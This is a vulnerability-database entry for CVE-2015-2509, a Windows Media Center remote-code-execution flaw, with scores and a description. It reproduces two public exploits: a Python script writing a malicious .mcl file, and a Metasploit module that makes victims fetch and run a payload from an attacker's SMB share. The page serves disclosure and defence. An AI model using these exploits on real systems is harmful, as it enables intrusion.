CVE-2015-2509 Detail

CVE-2015-2509

OWSAP

A01-Broken Access Control

EPSS

97.49%V3

Vector

Network

Published

2015-09-08
22h00 +00:00

Modified

2018-10-12
17h57 +00:00

Official links

CVE.org

NVD

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Notifications manage

List of Notifications

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Criteria applied when sending the alert: compared with the last alert sent + differences in CISA, EPSS, CVSS, CWE, Solutions, CPE.

Parameters

You can specify a title that will be retrieved in the alerts that will be sent out.

Specified here a CVE ID as CVE-2025-1234

Planning

Month

Next run calculation

Day

Weekday

Hour

Minute

Creation date

Last execution

Next execution

Functionality requiring a connection

This feature, which allows you to receive alerts, is only active when you are logged into your account.

CVE Descriptions

Windows Media Center in Microsoft Windows Vista SP2, Windows 7 SP1, Windows 8, and Windows 8.1 allows user-assisted remote attackers to execute arbitrary code via a crafted Media Center link (mcl) file, aka "Windows Media Center RCE Vulnerability."

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-284	Improper Access Control The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	9.3		AV:N/AC:M/Au:N/C:C/I:C/A:C	[email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 38151

Publication date : 2015-09-10 22h00 +00:00
Author : R-73eN
EDB Verified : No

# Title: MS15-100 Windows Media Center Command Execution # Date : 11/09/2015 # Author: R-73eN # Software: Windows Media Center # Tested : Windows 7 Ultimate # CVE : 2015-2509 banner = "" banner += " ___ __ ____ _ _ \n" banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n" banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n" banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n" banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n" print banner command = "calc.exe" evil = '<application run="' + command + '"/>' f = open("Music.mcl","w") f.write(evil) f.close() print "\n[+] Music.mcl generated . . . [+]"

Exploit Database EDB-ID : 38195

Publication date : 2015-09-14 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::EXE include Msf::Exploit::Remote::SMB::Server::Share def initialize(info={}) super(update_info(info, 'Name' => "MS15-100 Microsoft Windows Media Center MCL Vulnerability", 'Description' => %q{ This module exploits a vulnerability in Windows Media Center. By supplying an UNC path in the *.mcl file, a remote file will be automatically downloaded, which can result in arbitrary code execution. }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r', ], 'References' => [ ['CVE', '2015-2509'], ['MSB', 'MS15-100'] ], 'Payload' => { 'DisableNops' => true }, 'DefaultOptions' => { 'DisablePayloadHandler' => 'false' }, 'Platform' => 'win', 'Targets' => [ ['Windows', {}], ], 'Privileged' => false, 'DisclosureDate' => "Sep 8 2015", 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [true, 'The MCL file', 'msf.mcl']), OptString.new('FILE_NAME', [ false, 'The name of the malicious payload to execute', 'msf.exe']) ], self.class) deregister_options('FILE_CONTENTS') end def generate_mcl %Q|<application run="#{unc}" />| end def primer self.file_contents = generate_payload_exe print_status("Malicious executable at #{unc}...") print_status("Creating '#{datastore['FILENAME']}' file ...") mcl = generate_mcl file_create(mcl) end end